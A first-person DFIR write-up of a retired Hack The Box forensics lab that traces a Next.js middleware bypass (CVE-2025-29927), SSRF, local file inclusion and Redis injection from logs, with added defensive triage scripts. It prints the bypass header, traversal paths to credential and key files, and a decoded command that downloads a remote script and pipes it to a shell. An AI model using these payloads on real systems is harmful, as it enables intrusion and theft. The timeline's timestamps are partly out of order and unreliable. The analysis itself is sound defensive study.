# NeuroSync-D

**About the box**

* DFIR
* Easy
* Retired
* [link](https://app.hackthebox.com/sherlocks/NeuroSync-D?tab=play_sherlock)

***

## Background

> NeuroSync™ is a leading suite of products focusing on developing cutting-edge medical BCI devices, designed by the Korosaki Corporation. Recently, an APT group targeted them and was able to infiltrate their infrastructure and is now moving laterally to compromise more systems. It appears that they have even managed to hijack a large number of online devices by exploiting an N-day vulnerability. Your task is to find out how they were able to compromise the infrastructure and understand how to secure it.

I downloaded the evidence file from HTB, and this is what we got:

<figure><img src="/files/UgKtGcFQOD12h9QXLzKI" alt=""><figcaption></figcaption></figure>

I went in with zero methodology and zero playbook, because I had never investigated a web-related attack before.

### 1. What version of Next.js is the application using?

Before that, I knew Next.js was some web-related framework, but I wasn't 100% sure what it was used for.

Then I googled it: <mark style="background-color:$warning;">Next.js is a React-based framework by Vercel that handles routing, bundling, server-side rendering, all the boring stuff automatically</mark>

Since it's a frontend framework, `interface.log` is the right place to look. The dev-server startup banner gives it away immediately:

<figure><img src="/files/RgN6t3PHOVfCBYfNiquP" alt=""><figcaption></figcaption></figure>

Answer: `15.1.0`

***

### 2. What local port is the Next.js-based application running on?

We can see it in the above screenshot:

`http://localhost:3000`

Answer: `3000`

***

### 3. A critical Next.js vulnerability was released in March 2025, and this version appears to be affected. What is the CVE identifier for this vulnerability?

I searched "Next.js vulnerability March 2025" + the version and landed on this pretty fast.

<figure><img src="/files/QrGFsx0x1r3DKjLy2oM3" alt=""><figcaption></figcaption></figure>

**CVE-2025-29927** — a critical middleware authorization bypass (CVSS 9.1)

OK, I didn't have any idea about this vulnerability, so I watched some YouTube and asked ChatGPT.

This is what I understood:

**middleware** in a Next.js app is code that runs before every request reaches the actual page or API route. Think of it like a bouncer: every request has to pass through it, and it decides whether to let you in, kick you out, or redirect you somewhere else.

**How the attack works:**

Say you're running `example.com` and you have an admin page at `example.com/admin`. The middleware's job is simple — if you have the right credentials, let you through; if not, block you. That's it.

The bug is that Next.js has a quirk: `x-middleware-subrequest` is an internal header the framework sets on its own subrequests so the middleware does not run again on them. If an external request simply carries that header, the middleware skips itself and lets the request pass through unchecked.

```
GET /admin
x-middleware-subrequest: middleware
```

That's it. Send that header and you're inside the admin page — no credentials, no checks, nothing.

More about the vulnerability on this page:
<https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927>

Answer: `CVE-2025-29927`

***

### 4. The attacker tried to enumerate some static files that are typically available in the Next.js framework, most likely to retrieve its version. What is the first file he could get?

The attacker hit a bunch of `/_next/static/chunks/` paths trying to pull known Next.js files.

Most returned 404, but in `access.log` the first one to come back with HTTP 200 was:

<figure><img src="/files/dBXGiXIG4QRVfUk0gChN" alt=""><figcaption></figcaption></figure>

Answer: `main-app.js`

***

### 5. Then the attacker appears to have found an endpoint that is potentially affected by the previously identified vulnerability. What is that endpoint?

In `access.log` I saw this route being hit repeatedly with different status codes: it started with `401`, and then they got `200`.

I think it's the protected endpoint the middleware is supposed to stop people from accessing.

<figure><img src="/files/jez6sYgNtCOKDzmNqR7J" alt=""><figcaption></figcaption></figure>

Answer: `/api/bci/analytics`

***

### 6. How many requests to this endpoint have resulted in an "Unauthorized" response?

5 failed attempts:

<figure><img src="/files/h19TcMMkC4nPzoFcXquc" alt=""><figcaption></figcaption></figure>

Answer: `5`

***

### 7. When is a successful response received from the vulnerable endpoint, meaning that the middleware has been bypassed?

Within a couple of minutes they were in; the analytics endpoint is now wide open.

<figure><img src="/files/oLxonIn2JVdPv2nPfbuK" alt=""><figcaption></figcaption></figure>

Answer: `2025-04-01 11:38:05`

***

### 8. Given the previous failed requests, what will most likely be the final value for the vulnerable header used to exploit the vulnerability and bypass the middleware?

I actually got confused here at first — I thought seeing `middleware:middleware:middleware:middleware` in the logs was the answer (4 segments). It wasn't.

<figure><img src="https://media3.giphy.com/media/v1.Y2lkPTZjMDliOTUybm5kNjVyMnE1NmY3YXBzYWd3dW5rdzVhZGJtdmkxcGswcjBraWl2dCZlcD12MV9naWZzX3NlYXJjaCZjdD1n/WRQBXSCnEFJIuxktnw/200.gif" alt=""><figcaption></figcaption></figure>

I really didn't get it, so I literally copy-pasted the `middleware:...` value. Then I went through some blogs and found this:

<figure><img src="/files/eawVXvlMhMm93VrS4TA1" alt=""><figcaption></figcaption></figure>

[blog](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)

The framework splits the header value on `:` and counts the segments. Each segment matching the middleware name increments the depth counter. When `depth >= MAX_RECURSION_DEPTH` (which is 5), the middleware is skipped. So you need exactly 5 segments:

```
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```

We can see in `interface.log` that the earlier attempts with 1, 2, 3 and 4 segments all failed. The 5-segment version was the one that got the 200.

Answer: `middleware:middleware:middleware:middleware:middleware`

Now they have bypassed auth on the analytics endpoint.
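To make the depth-counting rule from questions 5 to 8 concrete, here is an added triage helper (my code, not the writeup's and not Next.js source). It models the count described above, flags every request that carries the internal header, and shows the proxy-side workaround of dropping the header before it reaches the app. The log line layout is constructed for the example and is not the real format of `interface.log`; only the timestamps, endpoint and header values come from the writeup.

```javascript
// Added example, not code from the writeup or from Next.js itself. It models
// the depth count the writeup describes for CVE-2025-29927 and turns it into
// a log triage helper. The log line layout below is CONSTRUCTED for this
// example and is not the exact format of the Sherlock's interface.log.

const MAX_RECURSION_DEPTH = 5;        // recursion limit named in the writeup
const MIDDLEWARE_NAME = "middleware"; // the middleware's name in this app

// Split the header on ":" and count segments equal to the middleware name.
// The framework skips the middleware once that count reaches the limit.
function middlewareDepth(headerValue) {
  if (!headerValue) return 0;
  return headerValue.split(":").filter((seg) => seg === MIDDLEWARE_NAME).length;
}

function middlewareSkipped(headerValue) {
  return middlewareDepth(headerValue) >= MAX_RECURSION_DEPTH;
}

// Constructed line layout:
//   "<date> <time> <METHOD> <path> <status>[ x-middleware-subrequest=<value>]"
const LINE_RE = /^(\S+ \S+) (\S+) (\S+) (\d{3})(?: x-middleware-subrequest=(\S+))?$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ts: m[1], method: m[2], path: m[3], status: Number(m[4]), subrequest: m[5] ?? null };
}

// x-middleware-subrequest is an internal header; a client has no legitimate
// reason to send it, so every external occurrence is worth an alert. The
// depth and the status code only tell you whether the attempt got through.
function triage(lines) {
  const findings = [];
  for (const line of lines) {
    const e = parseLine(line);
    if (!e || e.subrequest === null) continue;
    const depth = middlewareDepth(e.subrequest);
    const succeeded = middlewareSkipped(e.subrequest) && e.status === 200;
    findings.push({
      ts: e.ts, path: e.path, status: e.status, depth,
      verdict: succeeded ? "bypass succeeded" : "bypass attempt",
    });
  }
  return findings;
}

// Mitigation at a reverse proxy or edge while unpatched: drop the header
// before it reaches the app. Header names compare case-insensitively.
function stripInternalHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== "x-middleware-subrequest") out[name] = value;
  }
  return out;
}

// Constructed sample reusing the writeup's timestamps and endpoint.
const SAMPLE_LOG = [
  "2025-04-01 11:37:17 GET / 200",
  "2025-04-01 11:37:58 GET /api/bci/analytics 401 x-middleware-subrequest=middleware",
  "2025-04-01 11:38:02 GET /api/bci/analytics 401 x-middleware-subrequest=middleware:middleware:middleware:middleware",
  "2025-04-01 11:38:05 GET /api/bci/analytics 200 x-middleware-subrequest=middleware:middleware:middleware:middleware:middleware",
];

for (const f of triage(SAMPLE_LOG)) {
  console.log(`${f.ts} ${f.path} status=${f.status} depth=${f.depth} -> ${f.verdict}`);
}
```

The first finding (depth 1, 401) and the last one (depth 5, 200) reproduce the pattern the writeup describes: failing attempts until the segment count reaches the recursion limit. The point for detection is the second filter, not the depth: a `401` with this header present is already an indicator, well before the successful `200`.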

***

### 9. The attacker chained the vulnerability with an SSRF attack, which allowed them to perform an internal port scan and discover an internal API. On which port is the API accessible?

again "SSRF" search in the google and i saw some examples what is ssrf how its done in basic in simple words SSRF is\
when attacker tricks a server into making network requests to a different location

Since the question says API, `data-api.log` is the right place.

<figure><img src="/files/IiveYpSkjhVv4iRJIBRG" alt=""><figcaption></figcaption></figure>

Port 4000, internal, not exposed publicly. The attacker used SSRF through the analytics endpoint to scan internal ports and confirm this service exists.

Answer: `4000`

***

### 10. After the port scan, the attacker starts a brute-force attack to find some vulnerable endpoints in the previously identified API. Which vulnerable endpoint was found?

The attacker brute-forced common REST endpoint names against `127.0.0.1:`. You can see them cycling through `/users`, `/profile`, `/settings`, `/password-reset`, `/forgot-password`, `/posts`, `/comments`, `/products`, `/orders`, `/cart` and more in `data-api.log`.

<figure><img src="/files/XAdl68ijnsR2mzN8fxn8" alt=""><figcaption></figcaption></figure>

Then I thought it was `/analytics`, but looking at the log I think this one is not vulnerable, so they moved forward.

<figure><img src="/files/sQOvgyHqTPLP8EjnfMlt" alt=""><figcaption></figcaption></figure>

Most were dead ends. Then they hit `/logs`, and it responded and accepted a `logFile` parameter. That's a red flag.

<figure><img src="/files/2hDDfan3hpxkGbBCH2KV" alt=""><figcaption></figcaption></figure>

Answer: `/logs`

***

### 11. When was the vulnerable endpoint first used maliciously?

<figure><img src="/files/DZbAUlr64U7MPpSKy80H" alt=""><figcaption></figcaption></figure>

Answer: `2025-04-01 11:39:01`

***

### 12. What is the attack name the endpoint is vulnerable to?

I actually asked ChatGPT on this one, not gonna pretend otherwise.

<figure><img src="/files/MdVc0rZAuzQaK988D8VT" alt=""><figcaption></figcaption></figure>

The `logFile` parameter takes user input and uses it directly to read a file, with no proper sanitization. The attacker used `../` sequences to climb out of the intended `/var/log/` directory and access arbitrary files anywhere on the system.

In simpler words: <mark style="background-color:$warning;">Local File Inclusion (LFI) is a web application vulnerability that allows an attacker to trick a server into executing or exposing unintended files</mark>

Answer: `Local File Inclusion`

***

### 13. What is the name of the file that was targeted the last time the vulnerable endpoint was exploited?

The final LFI request in `data-api.log`:

<figure><img src="/files/bLTvtpLvf8rsgITYEbLM" alt=""><figcaption></figcaption></figure>

A file literally called `secret.key` sitting in `/tmp`, probably some auth token or signing key.

Answer: `secret.key`

***

### 14. Finally, the attacker uses the sensitive information obtained earlier to create a special command that allows them to perform Redis injection and gain RCE on the system. What is the command string?

This one took a minute. BCI command? Google it. A BCI command is an action sent to a Brain-Computer Interface device — things like `MOVE_UP`, `MOVE_DOWN` etc. You can see legit ones being pushed to Redis throughout the logs.

In `redis.log` there's a suspicious `RPUSH` into `bci_commands` with a base64-encoded payload using the `OS_EXEC` prefix:

<figure><img src="/files/i49bYYACIkWsYKjlF1vQ" alt=""><figcaption></figcaption></figure>

Answer: `OS_EXEC|d2dldCBodHRwOi8vMTg1LjIwMi4yLjE0Ny9oNFBsbjQvcnVuLnNoIC1PLSB8IHNo|f1f0c1feadb5abc79e700cac7ac63cccf91e818ecf693ad7073e3a448fa13bbb`

***

### 15. Once decoded, what is the command?

Decode the base64 chunk and you get the command. Confirmed in `bci-device.log` where the device actually ran it:

<figure><img src="/files/VS82rTXGJl8zCMPkU192" alt=""><figcaption></figcaption></figure>

Answer: `wget http://185.202.2.147/h4Pln4/run.sh -O- | sh`
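For questions 14 and 15, here is an added triage helper (my code, not the writeup's or the NeuroSync application's) that parses entries of the kind pushed to the `bci_commands` Redis list, decodes the base64 field of an `OS_EXEC` entry and flags anything that is not a known device command. Two things are assumptions, not facts from the evidence: that legitimate commands are bare words such as `MOVE_UP`, and that every `OS_EXEC` entry has the three-field `type|base64|hex` shape of the single entry shown above.

```javascript
// Added example, not the writeup's or the NeuroSync application's code. It
// parses entries of the kind pushed to the `bci_commands` Redis list so an
// analyst can decode OS_EXEC payloads and flag anything off the allowlist.
// ASSUMPTIONS (not confirmed by the writeup): legitimate commands are bare
// words such as MOVE_UP, and an OS_EXEC entry is always "<type>|<base64>|<hex>",
// the shape of the single entry shown in the writeup.

// Constructed allowlist built from the command names the writeup mentions.
const KNOWN_BCI_COMMANDS = new Set(["MOVE_UP", "MOVE_DOWN"]);

// Heuristic for the decoded payload: a download piped straight into a shell.
const SHELL_PIPE_RE = /\b(wget|curl)\b.*\|\s*(sh|bash)\b/;

function parseBciCommand(entry) {
  const parts = entry.split("|");
  if (parts.length === 1) {
    return { type: parts[0], payload: null, sig: null, malformed: false };
  }
  if (parts.length !== 3) {
    return { type: parts[0], payload: null, sig: null, malformed: true };
  }
  const [type, b64, sig] = parts;
  // Buffer.from(..., "base64") is lenient: it skips characters outside the
  // alphabet instead of throwing, so no try/catch is needed here.
  const payload = Buffer.from(b64, "base64").toString("utf8");
  return { type, payload, sig, malformed: false };
}

function triageCommand(entry) {
  const cmd = parseBciCommand(entry);
  const reasons = [];
  if (cmd.malformed) reasons.push("unexpected field count");
  if (!KNOWN_BCI_COMMANDS.has(cmd.type)) {
    reasons.push(`command type ${cmd.type} is not on the allowlist`);
  }
  if (cmd.payload !== null && SHELL_PIPE_RE.test(cmd.payload)) {
    reasons.push("decoded payload pipes a download into a shell");
  }
  if (cmd.sig !== null && !/^[0-9a-f]{64}$/i.test(cmd.sig)) {
    reasons.push("third field is not a 64-hex-char digest");
  }
  return { ...cmd, suspicious: reasons.length > 0, reasons };
}

function triageAll(entries) {
  return entries.map(triageCommand).filter((r) => r.suspicious);
}

// Constructed excerpt: two normal commands and the RPUSH value from the writeup.
const SAMPLE_RPUSH_ENTRIES = [
  "MOVE_UP",
  "MOVE_DOWN",
  "OS_EXEC|d2dldCBodHRwOi8vMTg1LjIwMi4yLjE0Ny9oNFBsbjQvcnVuLnNoIC1PLSB8IHNo|f1f0c1feadb5abc79e700cac7ac63cccf91e818ecf693ad7073e3a448fa13bbb",
];

for (const r of triageAll(SAMPLE_RPUSH_ENTRIES)) {
  console.log(`${r.type}: ${r.payload}\n  ${r.reasons.join("; ")}`);
}
```

Running it over the sample decodes the third entry to `wget http://185.202.2.147/h4Pln4/run.sh -O- | sh` and flags it twice (unknown command type, download piped to a shell); the 64-hex third field passes the format check, which is consistent with the writeup's guess that `secret.key` was used to sign the command rather than proof of it.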

***

### Timeline

I used Claude to write this.

```
2025-04-01 11:37:17  [RECON]          GET / → HTTP 200, confirms live target
2025-04-01 11:37:35  [RECON]          GET /_next/static/chunks/framework.js → 404
2025-04-01 11:37:38  [RECON]          GET /_next/static/chunks/main.js → 404
2025-04-01 11:37:40  [RECON]          GET /_next/static/chunks/commons.js → 404
2025-04-01 11:37:44  [FINGERPRINT]    GET /_next/static/chunks/main-app.js → 200 ✓ version confirmed
2025-04-01 11:37:47  [RECON]          GET /_next/static/chunks/app/page.js → 200
2025-04-01 11:37:58  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 1)
2025-04-01 11:37:59  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 2)
2025-04-01 11:38:01  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 3)
2025-04-01 11:38:02  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 4)
2025-04-01 11:38:04  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 5)
2025-04-01 11:38:05  [CVE-2025-29927] GET /api/bci/analytics + x-middleware-subrequest → 200 ✓ bypass success
2025-04-01 11:35:09  [SSRF]           Internal port scan → port 4000 discovered (data-api service)
2025-04-01 11:38:37  [BRUTE]          GET /users, /profile, /settings, /password-reset ... → all dead ends
2025-04-01 11:38:52  [BRUTE]          GET /logs → responds + accepts logFile param ✓
2025-04-01 11:38:52  [LFI]            GET /logs?logFile=/var/log/logfile.txt → baseline test
2025-04-01 11:39:01  [LFI]            GET /logs?logFile=../../../../etc/passwd → 20 lines read ✓
2025-04-01 11:39:03  [LFI]            GET /logs?logFile=../../../../proc/self/environ → 1 line read ✓
2025-04-01 11:39:05  [LFI]            GET /logs?logFile=../../../../var/log/app.log → read ✓
2025-04-01 11:39:07  [LFI]            GET /logs?logFile=../../../../app/data-api/index.js → read ✓
2025-04-01 11:39:24  [LFI]            GET /logs?logFile=../../../../tmp/secret.key → read ✓ key obtained
2025-04-01 11:39:39  [REDIS INJECT]   RPUSH bci_commands OS_EXEC|base64(wget ...run.sh -O- | sh)|secret.key
2025-04-01 11:39:26  [RCE]            BCI Device executes: wget http://185.202.2.147/h4Pln4/run.sh -O- | sh
```

***

I wanted to search more for what happened next, but the logs ended there.

<figure><img src="/files/RAp2WnYSIWNpDmx4baF1" alt=""><figcaption></figcaption></figure>

